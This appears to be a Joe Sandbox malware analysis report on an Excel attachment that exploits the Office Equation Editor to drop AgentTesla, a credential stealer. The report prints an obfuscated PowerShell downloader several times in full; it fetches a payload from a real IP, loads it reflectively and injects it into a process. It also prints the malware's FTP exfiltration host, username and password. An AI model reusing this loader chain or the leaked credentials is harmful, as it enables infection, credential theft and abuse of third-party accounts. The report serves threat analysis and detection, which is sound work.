Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Nuevo orden.xlam.xlsx

Overview

General Information

Sample name:Nuevo orden.xlam.xlsx
Analysis ID:1467952
MD5:563632ea84cbb9b6c4a19223cd655c67
SHA1:fb0f18bd97964f8ee3dd6e1c7413c1de855e8568
SHA256:d8ba98fe2f2715873622ec5d987ac06da81077ad593d045b925007680d625025
Tags:xlamxlsx
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Yara detected Powershell download and execute
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Obfuscated command line found
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2836 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 2772 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 1968 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\datingloverstartingAgain.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 540 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('by6link = EnNhttp://91.92.254.194/imge/new-image_v.jpgEnN; by6webClient ='+' New-Object System.N'+'et.WebClient; tr'+'y { by6downloadedData = b'+'y6webClient.DownloadData(by6link) } catch { Write'+'-H'+'ost EnNFailed To download dat'+'a f'+'rom by6linkEnN -ForegroundColor Red; exit }; if (by6downloadedData -ne by6null) { by6ima'+'geT'+'ext = [System.Text.Encoding]::UTF8.GetString(by6downloadedData); by6star'+'tFlag'+' = EnN<<BASE64_START>>EnN; by6endFlag = EnN<<BASE64_END>>EnN; by6startIndex = by6imageText.IndexOf(by6startFlag); by6endIndex = by6ima'+'geTe'+'xt.I'+'ndexOf(by6en'+'dFlag); if (by6startIndex'+' -ge 0 -and b'+'y6endIndex -gt by6startIndex) { by6st'+'artIndex += by6startFl'+'ag.Length; by6base6'+'4Length = by6endIndex - by6startIndex; by6base64Co'+'mmand = by6imageText.Substring(by6startInd'+'ex, by6ba'+'se64Length); by6commandByt'+'es = [System.Convert]::FromBase6'+'4String(by6base64Command); by6loadedAssembly = [System.Reflection.Assembly]::L'+'oad(by6commandBytes); by6t'+'ype = by6loadedAssembly.GetType(EnNRunPE.HomeEnN); by6method = by6type.GetMethod(EnNVAIEnN).Invoke(by6null, [object'+'[]] (E'+'nNtxt.46esab/841.612.3.291//:ptthEnN , EnNdesativadoEnN , '+'EnNdesativa'+'doEnN , EnNdesativadoEnN,EnNA'+'dd'+'InProcess32EnN,EnNEn'+'N)) } }')-CREPLACE([CHar]98+[CHar]121+[CHar]54),[CHar]36 -rEpLaCe([CHar]69+[CHar]110+[CHar]78),[CHar]39)| iex" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • AddInProcess32.exe (PID: 2888 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.horeca-bucuresti.ro", "Username": "americas2@horeca-bucuresti.ro", "Password": "H*TE9iL;x61m"}
SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x27b:$s1: <legacyDrawing r:id="
  • 0x2a3:$s2: <oleObject progId="
  • 0x2da:$s3: autoLoad="true"
SourceRuleDescriptionAuthorStrings
00000008.00000002.619369969.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000008.00000002.619369969.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000006.00000002.473828198.00000000033B9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000006.00000002.473828198.00000000033B9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000008.00000002.619828282.0000000002395000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 8 entries
            SourceRuleDescriptionAuthorStrings
            8.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              8.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                8.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  8.2.AddInProcess32.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x343e7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x34459:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x344e3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x34575:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x345df:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x34651:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x346e7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x34777:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  8.2.AddInProcess32.exe.400000.0.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x315ca:$s2: GetPrivateProfileString
                  • 0x30c9c:$s3: get_OSFullName
                  • 0x3230a:$s5: remove_Key
                  • 0x324ba:$s5: remove_Key
                  • 0x333b1:$s6: FtpWebRequest
                  • 0x343c9:$s7: logins
                  • 0x3493b:$s7: logins
                  • 0x3764c:$s7: logins
                  • 0x376fe:$s7: logins
                  • 0x39051:$s7: logins
                  • 0x38298:$s9: 1.85 (Hash, version 2, native byte-order)
                  Click to see the 9 entries

                  Exploits

                  barindex
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.3.216.148, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2772, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2772, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\datingloverstartingAgain[1].vbs

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2772, Protocol: tcp, SourceIp: 192.3.216.148, SourceIsIpv6: false, SourcePort: 80
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('by6link = EnNhttp://91.92.254.194/imge/new-image_v.jpgEnN; by6webClient ='+' New-Object System.N'+'et.WebClient; tr'+'y { by6downloadedData = b'+'y6webClient.DownloadData(by6link) } catch { Write'+'-H'+'ost EnNFailed To download dat'+'a f'+'rom by6linkEnN -ForegroundColor Red; exit }; if (by6downloadedData -ne by6null) { by6ima'+'geT'+'ext = [System.Text.Encoding]::UTF8.GetString(by6downloadedData); by6star'+'tFlag'+' = EnN<<BASE64_START>>EnN; by6endFlag = EnN<<BASE64_END>>EnN; by6startIndex = by6imageText.IndexOf(by6startFlag); by6endIndex = by6ima'+'geTe'+'xt.I'+'ndexOf(by6en'+'dFlag); if (by6startIndex'+' -ge 0 -and b'+'y6endIndex -gt by6startIndex) { by6st'+'artIndex += by6startFl'+'ag.Length; by6base6'+'4Length = by6endIndex - by6startIndex; by6base64Co'+'mmand = by6imageText.Substring(by6startInd'+'ex, by6ba'+'se64Length); by6commandByt'+'es = [System.Convert]::FromBase6'+'4String(by6base64Command); by6loadedAssembly = [System.Reflection.Assembly]::L'+'oad(by6commandBytes); by6t'+'ype = by6loadedAssembly.GetType(EnNRunPE.HomeEnN); by6method = by6type.GetMethod(EnNVAIEnN).Invoke(by6null, [object'+'[]] (E'+'nNtxt.46esab/841.612.3.291//:ptthEnN , EnNdesativadoEnN , '+'EnNdesativa'+'doEnN , EnNdesativadoEnN,EnNA'+'dd'+'InProcess32EnN,EnNEn'+'N)) } }')-CREPLACE([CHar]98+[CHar]121+[CHar]54),[CHar]36 -rEpLaCe([CHar]69+[CHar]110+[CHar]78),[CHar]39)| iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('by6link = EnNhttp://91.92.254.194/imge/new-image_v.jpgEnN; by6webClient ='+' New-Object System.N'+'et.WebClient; tr'+'y { by6downloadedData = b'+'y6webClient.DownloadData(by6link) } catch { Write'+'-H'+'ost EnNFailed To download dat'+'a f'+'rom by6linkEnN -ForegroundColor Red; exit }; if (by6downloadedData -ne by6null) { by6ima'+'geT'+'ext = [System.Text.Encoding]::UTF8.GetString(by6downloadedData); by6star'+'tFlag'+' = EnN<<BASE64_START>>EnN; by6endFlag = EnN<<BASE64_END>>EnN; by6startIndex = by6imageText.IndexOf(by6startFlag); by6endIndex = by6ima'+'geTe'+'xt.I'+'ndexOf(by6en'+'dFlag); if (by6startIndex'+' -ge 0 -and b'+'y6endIndex -gt by6startIndex) { by6st'+'artIndex += by6startFl'+'ag.Length; by6base6'+'4Length = by6endIndex - by6startIndex; by6base64Co'+'mmand = by6imageText.Substring(by6startInd'+'ex, by6ba'+'se64Length); by6commandByt'+'es = [System.Convert]::FromBase6'+'4String(by6base64Command); by6loadedAssembly = [System.Reflection.Assembly]::L'+'oad(by6commandBytes); by6t'+'ype = by6loadedAssembly.GetType(EnNRunPE.HomeEnN); by6method = by6type.GetMethod(EnNVAIEnN).Invoke(by6null, [object'+'[]] (E'+'nNtxt.46esab/841.612.3.291//:ptthEnN , EnNdesativadoEnN , '+'EnNdesativa'+'doEnN , EnNdesativadoEnN,EnNA'+'dd'+'InProcess32EnN,EnNEn'+'N)) } }')-CREPLACE([CHar]98+[CHar]121+[CHar]54),[CHar]36 -rEpLaCe([CHar]69+[CHar]110+[CHar]78),[CHar]39)| iex", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\Wind
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('by6link = EnNhttp://91.92.254.194/imge/new-image_v.jpgEnN; by6webClient ='+' New-Object System.N'+'et.WebClient; tr'+'y { by6downloadedData = b'+'y6webClient.DownloadData(by6link) } catch { Write'+'-H'+'ost EnNFailed To download dat'+'a f'+'rom by6linkEnN -ForegroundColor Red; exit }; if (by6downloadedData -ne by6null) { by6ima'+'geT'+'ext = [System.Text.Encoding]::UTF8.GetString(by6downloadedData); by6star'+'tFlag'+' = EnN<<BASE64_START>>EnN; by6endFlag = EnN<<BASE64_END>>EnN; by6startIndex = by6imageText.IndexOf(by6startFlag); by6endIndex = by6ima'+'geTe'+'xt.I'+'ndexOf(by6en'+'dFlag); if (by6startIndex'+' -ge 0 -and b'+'y6endIndex -gt by6startIndex) { by6st'+'artIndex += by6startFl'+'ag.Length; by6base6'+'4Length = by6endIndex - by6startIndex; by6base64Co'+'mmand = by6imageText.Substring(by6startInd'+'ex, by6ba'+'se64Length); by6commandByt'+'es = [System.Convert]::FromBase6'+'4String(by6base64Command); by6loadedAssembly = [System.Reflection.Assembly]::L'+'oad(by6commandBytes); by6t'+'ype = by6loadedAssembly.GetType(EnNRunPE.HomeEnN); by6method = by6type.GetMethod(EnNVAIEnN).Invoke(by6null, [object'+'[]] (E'+'nNtxt.46esab/841.612.3.291//:ptthEnN , EnNdesativadoEnN , '+'EnNdesativa'+'doEnN , EnNdesativadoEnN,EnNA'+'dd'+'InProcess32EnN,EnNEn'+'N)) } }')-CREPLACE([CHar]98+[CHar]121+[CHar]54),[CHar]36 -rEpLaCe([CHar]69+[CHar]110+[CHar]78),[CHar]39)| iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('by6link = EnNhttp://91.92.254.194/imge/new-image_v.jpgEnN; by6webClient ='+' New-Object System.N'+'et.WebClient; tr'+'y { by6downloadedData = b'+'y6webClient.DownloadData(by6link) } catch { Write'+'-H'+'ost EnNFailed To download dat'+'a f'+'rom by6linkEnN -ForegroundColor Red; exit }; if (by6downloadedData -ne by6null) { by6ima'+'geT'+'ext = [System.Text.Encoding]::UTF8.GetString(by6downloadedData); by6star'+'tFlag'+' = EnN<<BASE64_START>>EnN; by6endFlag = EnN<<BASE64_END>>EnN; by6startIndex = by6imageText.IndexOf(by6startFlag); by6endIndex = by6ima'+'geTe'+'xt.I'+'ndexOf(by6en'+'dFlag); if (by6startIndex'+' -ge 0 -and b'+'y6endIndex -gt by6startIndex) { by6st'+'artIndex += by6startFl'+'ag.Length; by6base6'+'4Length = by6endIndex - by6startIndex; by6base64Co'+'mmand = by6imageText.Substring(by6startInd'+'ex, by6ba'+'se64Length); by6commandByt'+'es = [System.Convert]::FromBase6'+'4String(by6base64Command); by6loadedAssembly = [System.Reflection.Assembly]::L'+'oad(by6commandBytes); by6t'+'ype = by6loadedAssembly.GetType(EnNRunPE.HomeEnN); by6method = by6type.GetMethod(EnNVAIEnN).Invoke(by6null, [object'+'[]] (E'+'nNtxt.46esab/841.612.3.291//:ptthEnN , EnNdesativadoEnN , '+'EnNdesativa'+'doEnN , EnNdesativadoEnN,EnNA'+'dd'+'InProcess32EnN,EnNEn'+'N)) } }')-CREPLACE([CHar]98+[CHar]121+[CHar]54),[CHar]36 -rEpLaCe([CHar]69+[CHar]110+[CHar]78),[CHar]39)| iex", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\Wind
                  Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 91.92.254.29, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 1968, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\datingloverstartingAgain.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\datingloverstartingAgain.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2772, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\datingloverstartingAgain.vbs" , ProcessId: 1968, ProcessName: wscript.exe
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\datingloverstartingAgain.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\datingloverstartingAgain.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2772, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\datingloverstartingAgain.vbs" , ProcessId: 1968, ProcessName: wscript.exe
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 91.92.254.29, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 1968, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162
                  Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, QueryName: ip-api.com
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\datingloverstartingAgain.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\datingloverstartingAgain.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2772, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\datingloverstartingAgain.vbs" , ProcessId: 1968, ProcessName: wscript.exe
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2772, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('by6link = EnNhttp://91.92.254.194/imge/new-image_v.jpgEnN; by6webClient ='+' New-Object System.N'+'et.WebClient; tr'+'y { by6downloadedData = b'+'y6webClient.DownloadData(by6link) } catch { Write'+'-H'+'ost EnNFailed To download dat'+'a f'+'rom by6linkEnN -ForegroundColor Red; exit }; if (by6downloadedData -ne by6null) { by6ima'+'geT'+'ext = [System.Text.Encoding]::UTF8.GetString(by6downloadedData); by6star'+'tFlag'+' = EnN<<BASE64_START>>EnN; by6endFlag = EnN<<BASE64_END>>EnN; by6startIndex = by6imageText.IndexOf(by6startFlag); by6endIndex = by6ima'+'geTe'+'xt.I'+'ndexOf(by6en'+'dFlag); if (by6startIndex'+' -ge 0 -and b'+'y6endIndex -gt by6startIndex) { by6st'+'artIndex += by6startFl'+'ag.Length; by6base6'+'4Length = by6endIndex - by6startIndex; by6base64Co'+'mmand = by6imageText.Substring(by6startInd'+'ex, by6ba'+'se64Length); by6commandByt'+'es = [System.Convert]::FromBase6'+'4String(by6base64Command); by6loadedAssembly = [System.Reflection.Assembly]::L'+'oad(by6commandBytes); by6t'+'ype = by6loadedAssembly.GetType(EnNRunPE.HomeEnN); by6method = by6type.GetMethod(EnNVAIEnN).Invoke(by6null, [object'+'[]] (E'+'nNtxt.46esab/841.612.3.291//:ptthEnN , EnNdesativadoEnN , '+'EnNdesativa'+'doEnN , EnNdesativadoEnN,EnNA'+'dd'+'InProcess32EnN,EnNEn'+'N)) } }')-CREPLACE([CHar]98+[CHar]121+[CHar]54),[CHar]36 -rEpLaCe([CHar]69+[CHar]110+[CHar]78),[CHar]39)| iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('by6link = EnNhttp://91.92.254.194/imge/new-image_v.jpgEnN; by6webClient ='+' New-Object System.N'+'et.WebClient; tr'+'y { by6downloadedData = b'+'y6webClient.DownloadData(by6link) } catch { Write'+'-H'+'ost EnNFailed To download dat'+'a f'+'rom by6linkEnN -ForegroundColor Red; exit }; if (by6downloadedData -ne by6null) { by6ima'+'geT'+'ext = [System.Text.Encoding]::UTF8.GetString(by6downloadedData); by6star'+'tFlag'+' = EnN<<BASE64_START>>EnN; by6endFlag = EnN<<BASE64_END>>EnN; by6startIndex = by6imageText.IndexOf(by6startFlag); by6endIndex = by6ima'+'geTe'+'xt.I'+'ndexOf(by6en'+'dFlag); if (by6startIndex'+' -ge 0 -and b'+'y6endIndex -gt by6startIndex) { by6st'+'artIndex += by6startFl'+'ag.Length; by6base6'+'4Length = by6endIndex - by6startIndex; by6base64Co'+'mmand = by6imageText.Substring(by6startInd'+'ex, by6ba'+'se64Length); by6commandByt'+'es = [System.Convert]::FromBase6'+'4String(by6base64Command); by6loadedAssembly = [System.Reflection.Assembly]::L'+'oad(by6commandBytes); by6t'+'ype = by6loadedAssembly.GetType(EnNRunPE.HomeEnN); by6method = by6type.GetMethod(EnNVAIEnN).Invoke(by6null, [object'+'[]] (E'+'nNtxt.46esab/841.612.3.291//:ptthEnN , EnNdesativadoEnN , '+'EnNdesativa'+'doEnN , EnNdesativadoEnN,EnNA'+'dd'+'InProcess32EnN,EnNEn'+'N)) } }')-CREPLACE([CHar]98+[CHar]121+[CHar]54),[CHar]36 -rEpLaCe([CHar]69+[CHar]110+[CHar]78),[CHar]39)| iex", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\Wind
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 540, TargetFilename: C:\Users\user\AppData\Local\Temp\hvvkv2tt.42n.ps1
                  Timestamp:07/05/24-06:23:57.231420
                  SID:2047750
                  Source Port:80
                  Destination Port:49163
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/05/24-06:23:57.231420
                  SID:2018856
                  Source Port:80
                  Destination Port:49163
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/05/24-06:23:57.232549
                  SID:2049038
                  Source Port:80
                  Destination Port:49163
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/05/24-06:23:54.876628
                  SID:2049038
                  Source Port:80
                  Destination Port:49162
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/05/24-06:23:58.201410
                  SID:2020425
                  Source Port:80
                  Destination Port:49164
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Nuevo orden.xlam.xlsxAvira: detected
                  Source: http://91.92.254.194/imge/new-image_v.jpgAvira URL Cloud: Label: malware
                  Source: 8.2.AddInProcess32.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.horeca-bucuresti.ro", "Username": "americas2@horeca-bucuresti.ro", "Password": "H*TE9iL;x61m"}
                  Source: Nuevo orden.xlam.xlsxReversingLabs: Detection: 75%
                  Source: Nuevo orden.xlam.xlsxVirustotal: Detection: 54%Perma Link

                  Exploits

                  barindex
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 192.3.216.148 Port: 80Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: RunPE.pdb source: powershell.exe, 00000006.00000002.475615054.000000000623A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.475615054.00000000061A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.473212454.00000000002B0000.00000004.08000000.00040000.00000000.sdmp

                  Software Vulnerabilities

                  barindex
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036205E6 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_036205E6
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03620557 LoadLibraryW,2_2_03620557
